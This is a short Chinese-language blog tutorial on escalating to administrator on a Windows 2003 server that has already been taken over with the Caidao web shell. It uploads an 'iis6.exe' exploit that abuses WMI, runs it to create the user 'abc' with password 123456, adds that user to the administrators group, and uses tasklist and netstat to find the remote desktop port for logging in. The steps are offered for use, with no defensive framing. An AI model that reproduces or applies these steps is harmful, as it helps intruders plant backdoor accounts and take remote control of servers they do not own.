IIS6也是一个比较古老的提权EXP了,是通过利用WMI的权限来执行命令。

目标机:漏洞巨多的Win2003

下面说一下通过IIS6在已用菜刀连接上的服务器上运用IIS6获得管理员权限的过程。

1.将cmd和IIS6上传到已用菜刀控制的服务器上。

利用IIS6提权获得管理员权限-LMLPHP

2.用cmd打开虚拟终端。

利用IIS6提权获得管理员权限-LMLPHP

3.建立用户并添加到管理员用户组

使用上传的cmd我们就直接拥有普通权限(可以用net user、whoami等命令)

尝试输入:whoami

发现

利用IIS6提权获得管理员权限-LMLPHP

这说明我们有权限了。

但是用net user abc 123456 /add却被拒绝访问

于是使用IIS6提权,用法:IIS6路径 "命令"

添加用户:E:\05\admin\Databackup\iis6.exe "net user abc 123456 /add"

检查一下是否成功:net user

利用IIS6提权获得管理员权限-LMLPHP

利用IIS6提权获得管理员权限-LMLPHP

从图上可以看出已经添加成功

下面将我们创建的用户添加到管理员用户组:

利用IIS6提权获得管理员权限-LMLPHP

4、你就可以在各个盘之间浪了。

彩蛋(利用远程控制端口对目标机进行远程控制)(远控端口默认端口为3389,但可被修改)

进行上面操作后,用命令tasklist -svc(进程线、PID、服务名(TermService:远程桌面服务名))

利用IIS6提权获得管理员权限-LMLPHP

这里我们找到了远控的PID 1644,下面再用

netstat -ano

本地连接地址、目标链接地址、链接状态、PID

利用IIS6提权获得管理员权限-LMLPHP

对应上面找到的PID可以找出端口3389(说明使用的默认端口)。

然后打开远程桌面控制

利用IIS6提权获得管理员权限-LMLPHP

就能 连接到目标机了。

05-11 21:41